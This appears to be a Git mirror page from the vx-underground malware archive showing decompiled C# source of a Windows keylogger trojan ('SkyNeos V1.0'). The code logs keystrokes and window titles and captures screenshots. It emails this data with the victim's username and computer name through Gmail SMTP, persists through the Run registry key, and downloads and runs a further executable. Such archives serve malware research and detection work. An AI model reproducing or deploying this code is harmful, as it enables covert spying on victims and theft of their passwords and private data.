daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
b5b08f64b9d82669889375d7c011c5b06a4ba76b
MalwareSourceCode/MSIL/Trojan-Spy/MSIL/K/Trojan-Spy.MSIL.KeyLogger.aqg-c67e985033bef3e2aef9ddea765a52d9924c3eaf56bd0f89fed02eca4dcc4ed2/LEThjJwJF.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

700 lines
19 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: LEThjJwJF
// Assembly: dfasdfasdfa, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4CC4AEAF-CB32-40A7-93E4-1293140F4D9C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Spy.MSIL.KeyLogger.aqg-c67e985033bef3e2aef9ddea765a52d9924c3eaf56bd0f89fed02eca4dcc4ed2.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing.Imaging;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
[StandardModule]
internal sealed class LEThjJwJF
{
public static Mutex LBfEuNPwTuuGhr;
public static string jxjVBchppIcvKk = "KrvSGxBAr";
[AccessedThroughProperty("IsaTynXgGxhXII")]
private static GUlBzjdJZuXUZ _IsaTynXgGxhXII;
public static string vyRLXDeEXvPQWn;
public static string zcgrfBtxzmomgI;
public static string EoCOQxuJnJYDws;
public static string tukiwEOEDyaPnz;
public static Thread oLCEyJcnQskyYp;
public static string CybgAJgPgyekGj;
public static Process dmflrmsAYJCkEy;
[AccessedThroughProperty("IcVuCUlomdNiel")]
private static System.Windows.Forms.Timer _IcVuCUlomdNiel;
private const int dnJJcXJyIKwvch = 7;
private const int NGLvHhzbViIlua = 1;
private const int tbVEQBdxchQoWB = 0;
public static string OnoIUSzrQrxnjB;
public static string wOUEeKkNhzkzfY;
public static string gPcDbDdHZdNBAW;
public static int LgTTNCfFJcIQQi;
public static int xBQNbJjyATSFJC;
public static LEThjJwJF.TSysInhDjBcGFY rDdhrXNgElssiY;
public static string BaYPuOHJbyQTtv;
public static bool VkOzzkssvUfPYY;
public static bool uooJgorLSWGNWt;
public static bool iokNYhvntnbVgp;
public static string OJtpurEVdlZmdS;
public static string zTOTtDtokbvSrZ;
public static string frJeiPgDsdQUYu;
public static string VxlrZQcCfRrFnE;
public static int xoHdskvHibDTJh;
public static bool tUQLlIpXzFpQeJ;
static LEThjJwJF()
{
LEThjJwJF.IsaTynXgGxhXII = new GUlBzjdJZuXUZ();
LEThjJwJF.EoCOQxuJnJYDws = "VzWJrYnjU";
LEThjJwJF.tukiwEOEDyaPnz = "OghDDYNXd.exe";
LEThjJwJF.IcVuCUlomdNiel = new System.Windows.Forms.Timer();
LEThjJwJF.OnoIUSzrQrxnjB = "";
LEThjJwJF.wOUEeKkNhzkzfY = "";
LEThjJwJF.gPcDbDdHZdNBAW = "smtp.gmail.com";
LEThjJwJF.LgTTNCfFJcIQQi = 587;
LEThjJwJF.xBQNbJjyATSFJC = 0;
LEThjJwJF.rDdhrXNgElssiY = (LEThjJwJF.TSysInhDjBcGFY) 0;
LEThjJwJF.BaYPuOHJbyQTtv = "";
LEThjJwJF.VkOzzkssvUfPYY = false;
LEThjJwJF.uooJgorLSWGNWt = false;
LEThjJwJF.iokNYhvntnbVgp = false;
LEThjJwJF.OJtpurEVdlZmdS = "";
LEThjJwJF.zTOTtDtokbvSrZ = "";
LEThjJwJF.frJeiPgDsdQUYu = "Title";
LEThjJwJF.VxlrZQcCfRrFnE = "Message";
LEThjJwJF.xoHdskvHibDTJh = 0;
LEThjJwJF.tUQLlIpXzFpQeJ = true;
}
public static GUlBzjdJZuXUZ IsaTynXgGxhXII
{
get => LEThjJwJF._IsaTynXgGxhXII;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
GUlBzjdJZuXUZ.xznKgAJnisfNwEventHandler ajnisfNwEventHandler = new GUlBzjdJZuXUZ.xznKgAJnisfNwEventHandler(LEThjJwJF.OJJjDKZdzRzsTI);
if (LEThjJwJF._IsaTynXgGxhXII != null)
GUlBzjdJZuXUZ.xznKgAJnisfNw -= ajnisfNwEventHandler;
LEThjJwJF._IsaTynXgGxhXII = value;
if (LEThjJwJF._IsaTynXgGxhXII == null)
return;
GUlBzjdJZuXUZ.xznKgAJnisfNw += ajnisfNwEventHandler;
}
}
public static System.Windows.Forms.Timer IcVuCUlomdNiel
{
get => LEThjJwJF._IcVuCUlomdNiel;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(LEThjJwJF.eOZluvJzvJbKQp);
if (LEThjJwJF._IcVuCUlomdNiel != null)
LEThjJwJF._IcVuCUlomdNiel.Tick -= eventHandler;
LEThjJwJF._IcVuCUlomdNiel = value;
if (LEThjJwJF._IcVuCUlomdNiel == null)
return;
LEThjJwJF._IcVuCUlomdNiel.Tick += eventHandler;
}
}
[DllImport("kernel32.dll", EntryPoint = "GetConsoleWindow", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ECEcSDPKNlQvLa();
[DllImport("user32.dll", EntryPoint = "ShowWindow", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int vEFEvQdUmPZzjh(IntPtr oEdTzAmaPJUJpF, int sVttGxniuprKER);
[DllImport("user32.dll", EntryPoint = "GetForegroundWindow", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int RXObLtJLQodkGr();
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int WJGkBFPXAviVGL(
int oEdTzAmaPJUJpF,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string cwppQcuhISQaZx,
int kJdbfAUxxSTCWk);
private static string AggalwHDhLcFHb()
{
string cwppQcuhISQaZx = new string(char.MinValue, 100);
LEThjJwJF.WJGkBFPXAviVGL(LEThjJwJF.RXObLtJLQodkGr(), ref cwppQcuhISQaZx, 100);
return cwppQcuhISQaZx.Substring(0, checked (Strings.InStr(cwppQcuhISQaZx, "\0") - 1));
}
public static void YXTfStbJfxcWgT(string syZuOZdVSbQJDx, string akvoUusLQaNmwv)
{
RegistryKey subKey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
subKey.SetValue(syZuOZdVSbQJDx, (object) akvoUusLQaNmwv);
}
public static void ogeDJGkbRGRssz(string syZuOZdVSbQJDx)
{
RegistryKey subKey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
subKey.DeleteValue(syZuOZdVSbQJDx, false);
}
public static void TlWvTrEsBCNDcF(string NgpLwlLuuhcRjj)
{
try
{
Mutex.OpenExisting(NgpLwlLuuhcRjj);
ProjectData.EndApp();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
LEThjJwJF.LBfEuNPwTuuGhr = new Mutex(false, NgpLwlLuuhcRjj);
ProjectData.ClearProjectError();
}
}
public static string JnXhPZhzwjNJTY(int gQGSyEvtnLQcVN, int YEUyahwovERJrc)
{
Random random = new Random();
string str1 = (string) null;
string str2 = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKHJJGFDSAZXCVBNM";
int num1 = random.Next(checked (gQGSyEvtnLQcVN + 1), YEUyahwovERJrc);
int num2 = 1;
while (num2 <= num1)
{
int index = checked ((int) Math.Round((double) unchecked (Conversion.Int((float) checked (str2.Length - 2) * VBMath.Rnd()) + 1f)));
str1 += Conversions.ToString(str2[index]);
checked { ++num2; }
}
return str1;
}
private static void OJJjDKZdzRzsTI(string otIDIvaQBJxmEP)
{
if (Operators.CompareString(LEThjJwJF.zcgrfBtxzmomgI, LEThjJwJF.AggalwHDhLcFHb(), false) != 0)
{
LEThjJwJF.vyRLXDeEXvPQWn = LEThjJwJF.vyRLXDeEXvPQWn + "\r\n[TITLE: " + LEThjJwJF.AggalwHDhLcFHb() + "]:\r\n";
LEThjJwJF.zcgrfBtxzmomgI = LEThjJwJF.AggalwHDhLcFHb();
Console.WriteLine("\r\n[TITLE: " + LEThjJwJF.AggalwHDhLcFHb() + "]:");
}
LEThjJwJF.vyRLXDeEXvPQWn += otIDIvaQBJxmEP;
Console.Write(otIDIvaQBJxmEP);
}
private static void eOZluvJzvJbKQp(object hyBhUjSkGpjtQn, EventArgs YekikJUBDRYaXk)
{
Console.WriteLine("A new log is sending...");
new Thread((ParameterizedThreadStart) (a0 => LEThjJwJF.WTnexoOosxyULb(Conversions.ToString(a0))))
{
IsBackground = true
}.Start((object) LEThjJwJF.vyRLXDeEXvPQWn);
LEThjJwJF.vyRLXDeEXvPQWn = "";
}
private static void WTnexoOosxyULb(string vlLsrZrnHJFsnA)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
string str = Path.GetTempPath() + "\\" + LEThjJwJF.JnXhPZhzwjNJTY(5, 10) + ".png";
label_2:
num3 = 3;
if (!LEThjJwJF.VkOzzkssvUfPYY)
goto label_7;
label_3:
num3 = 4;
SRBxUiHKAFOgn.JDZnglJSpvkpO();
label_4:
num3 = 5;
if (!System.IO.File.Exists(str))
goto label_6;
label_5:
num3 = 6;
System.IO.File.Delete(str);
label_6:
num3 = 8;
SRBxUiHKAFOgn.EJfUQWzljbDzy.Save(str, ImageFormat.Png);
label_7:
num3 = 10;
MailMessage message = new MailMessage();
label_8:
num3 = 11;
SmtpClient smtpClient1 = new SmtpClient(LEThjJwJF.gPcDbDdHZdNBAW);
label_9:
num3 = 12;
SmtpClient smtpClient2 = smtpClient1;
label_10:
num3 = 13;
smtpClient2.EnableSsl = true;
label_11:
num3 = 14;
smtpClient2.Credentials = (ICredentialsByHost) new NetworkCredential(LEThjJwJF.OnoIUSzrQrxnjB, LEThjJwJF.wOUEeKkNhzkzfY);
label_12:
num3 = 15;
smtpClient2.Port = LEThjJwJF.LgTTNCfFJcIQQi;
label_13:
smtpClient2 = (SmtpClient) null;
label_14:
num3 = 17;
MailMessage mailMessage = message;
label_15:
num3 = 18;
mailMessage.To.Add(LEThjJwJF.OnoIUSzrQrxnjB);
label_16:
num3 = 19;
mailMessage.From = new MailAddress(LEThjJwJF.OnoIUSzrQrxnjB);
label_17:
num3 = 20;
mailMessage.Subject = LEThjJwJF.BaYPuOHJbyQTtv;
label_18:
num3 = 21;
mailMessage.Body = vlLsrZrnHJFsnA;
label_19:
num3 = 22;
if (!LEThjJwJF.VkOzzkssvUfPYY)
goto label_21;
label_20:
num3 = 23;
mailMessage.Attachments.Add(new Attachment(str));
label_21:
num3 = 25;
if (!LEThjJwJF.iokNYhvntnbVgp)
goto label_23;
label_22:
num3 = 26;
mailMessage.Body = "Victim Username: " + LEThjJwJF.QlWcgtIzEAvYxr().ToString() + "\r\n" + mailMessage.Body;
label_23:
num3 = 28;
if (!LEThjJwJF.uooJgorLSWGNWt)
goto label_25;
label_24:
num3 = 29;
mailMessage.Body = "Victim Computer Name: " + MyProject.Computer.Name + "\r\n" + mailMessage.Body;
label_25:
mailMessage = (MailMessage) null;
label_26:
num3 = 32;
smtpClient1.Send(message);
label_27:
num3 = 33;
Console.WriteLine("##### Logs have been sent! #####");
goto label_34;
label_29:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
case 8:
goto label_6;
case 9:
case 10:
goto label_7;
case 11:
goto label_8;
case 12:
goto label_9;
case 13:
goto label_10;
case 14:
goto label_11;
case 15:
goto label_12;
case 16:
goto label_13;
case 17:
goto label_14;
case 18:
goto label_15;
case 19:
goto label_16;
case 20:
goto label_17;
case 21:
goto label_18;
case 22:
goto label_19;
case 23:
goto label_20;
case 24:
case 25:
goto label_21;
case 26:
goto label_22;
case 27:
case 28:
goto label_23;
case 29:
goto label_24;
case 30:
case 31:
goto label_25;
case 32:
goto label_26;
case 33:
goto label_27;
case 34:
goto label_34;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_29;
}
throw ProjectData.CreateProjectError(-2146828237);
label_34:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private static void UkhPcxsAocURHi()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
WebClient webClient = new WebClient();
label_2:
num3 = 3;
Uri address = new Uri(LEThjJwJF.OJtpurEVdlZmdS);
label_3:
num3 = 4;
LEThjJwJF.CybgAJgPgyekGj = Path.GetTempPath() + "\\" + LEThjJwJF.JnXhPZhzwjNJTY(5, 10) + ".exe";
label_4:
num3 = 5;
webClient.DownloadFileCompleted += new AsyncCompletedEventHandler(LEThjJwJF.tiBDFNfOUBvrAp);
label_5:
num3 = 6;
webClient.DownloadFileAsync(address, LEThjJwJF.CybgAJgPgyekGj);
goto label_12;
label_7:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_12;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_7;
}
throw ProjectData.CreateProjectError(-2146828237);
label_12:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private static void tiBDFNfOUBvrAp(object hyBhUjSkGpjtQn, AsyncCompletedEventArgs YekikJUBDRYaXk)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
Process process = new Process();
label_2:
num3 = 3;
ProcessStartInfo processStartInfo = process.StartInfo;
label_3:
num3 = 4;
processStartInfo.FileName = LEThjJwJF.CybgAJgPgyekGj;
label_4:
num3 = 5;
processStartInfo.UseShellExecute = true;
label_5:
processStartInfo = (ProcessStartInfo) null;
label_6:
num3 = 7;
process.Start();
goto label_13;
label_8:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private static string QlWcgtIzEAvYxr()
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);
string str = folderPath.Remove(folderPath.LastIndexOf("\\"));
return str.Substring(checked (str.LastIndexOf("\\") + 1));
}
[STAThread]
public static void Main()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
LEThjJwJF.TlWvTrEsBCNDcF(LEThjJwJF.jxjVBchppIcvKk);
label_2:
num3 = 3;
System.Windows.Forms.Timer timer = LEThjJwJF.IcVuCUlomdNiel;
label_3:
num3 = 4;
timer.Interval = checked (LEThjJwJF.xBQNbJjyATSFJC * int.Parse(Conversions.ToString(unchecked ((int) LEThjJwJF.rDdhrXNgElssiY))));
label_4:
num3 = 5;
timer.Start();
label_5:
timer = (System.Windows.Forms.Timer) null;
label_6:
num3 = 7;
LEThjJwJF.oLCEyJcnQskyYp = new Thread(new ThreadStart(LEThjJwJF.UkhPcxsAocURHi));
label_7:
num3 = 8;
Thread thread = LEThjJwJF.oLCEyJcnQskyYp;
label_8:
num3 = 9;
thread.IsBackground = true;
label_9:
num3 = 10;
thread.Start();
label_10:
thread = (Thread) null;
label_11:
num3 = 12;
LEThjJwJF.dmflrmsAYJCkEy = new Process();
label_12:
num3 = 13;
Process process = LEThjJwJF.dmflrmsAYJCkEy;
label_13:
num3 = 14;
process.StartInfo.FileName = LEThjJwJF.zTOTtDtokbvSrZ;
label_14:
num3 = 15;
process.StartInfo.UseShellExecute = true;
label_15:
num3 = 16;
process.Start();
label_16:
process = (Process) null;
label_17:
num3 = 18;
if (!LEThjJwJF.tUQLlIpXzFpQeJ)
goto label_19;
label_18:
num3 = 19;
int num4 = (int) Interaction.MsgBox((object) LEThjJwJF.VxlrZQcCfRrFnE, (MsgBoxStyle) LEThjJwJF.xoHdskvHibDTJh, (object) LEThjJwJF.frJeiPgDsdQUYu);
label_19:
num3 = 21;
Console.WriteLine("SkyNeos V1.0 Keylogger Engine Started Successfully!");
label_20:
num3 = 22;
string str = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
label_21:
num3 = 23;
MyProject.Computer.FileSystem.CreateDirectory(str + "\\" + LEThjJwJF.EoCOQxuJnJYDws);
label_22:
num3 = 24;
str = str + "\\" + LEThjJwJF.EoCOQxuJnJYDws + "\\" + LEThjJwJF.tukiwEOEDyaPnz;
label_23:
num3 = 25;
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str, true);
label_24:
num3 = 26;
LEThjJwJF.YXTfStbJfxcWgT(LEThjJwJF.EoCOQxuJnJYDws, str);
label_25:
num3 = 27;
LEThjJwJF.IsaTynXgGxhXII.ylfbkIvDnbUPN();
label_26:
num3 = 28;
Application.Run();
goto label_33;
label_28:
num2 = num3;
switch (num1)
{
case 1:
int num5 = num2 + 1;
num2 = 0;
switch (num5)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 13:
goto label_12;
case 14:
goto label_13;
case 15:
goto label_14;
case 16:
goto label_15;
case 17:
goto label_16;
case 18:
goto label_17;
case 19:
goto label_18;
case 20:
case 21:
goto label_19;
case 22:
goto label_20;
case 23:
goto label_21;
case 24:
goto label_22;
case 25:
goto label_23;
case 26:
goto label_24;
case 27:
goto label_25;
case 28:
goto label_26;
case 29:
goto label_33;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_28;
}
throw ProjectData.CreateProjectError(-2146828237);
label_33:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public enum TSysInhDjBcGFY
{
DjvWwOByJrBNLL = 1,
apBLZiogekZfLD = 1000, // 0x000003E8
yFFsuUtUnVajYf = 60000, // 0x0000EA60
jywVHvnnScKxxf = 3600000, // 0x0036EE80
}
}
Reference in New Issue View Git Blame Copy Permalink